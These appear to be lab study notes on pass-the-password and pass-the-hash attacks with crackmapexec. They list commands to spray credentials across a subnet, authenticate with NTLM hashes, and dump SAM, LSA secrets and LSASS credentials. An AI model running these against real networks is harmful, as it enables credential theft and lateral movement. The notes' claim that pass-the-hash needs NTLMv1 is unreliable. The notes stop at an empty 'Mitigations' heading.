Pass Attacks (The Pass/The Hash)

crackmapexec (cme)/nxc tips:

(Pwn3d!) means local admin, what we’re interested in

[+] means have access to

crackmapexec pass the pass:

crackmapexec smb 192.168.218.0/24 -u fcastle -d MARVEL.local -p Password1

crackmapexec pass the hash (only works with NTLM V1; V2 can be relayed though):

cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth

same command but also dump out the SAM in a database:

cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --sam

Enum the shares:

cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --shares

LSA Secrets:

cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --lsa

ALL the modules to use on cme:

cme smb -L

To run a module, use -M and then module name:

cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth -M lsassy
cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth -M lsassy

To find the database mentioned earlier and look for stuff in it:

cmedb

creds displays all the GOOD $#!@ (what user and pass worked on what and what format (plaintext or hash)):

creds

Dumping and Cracking Hashes Mitigations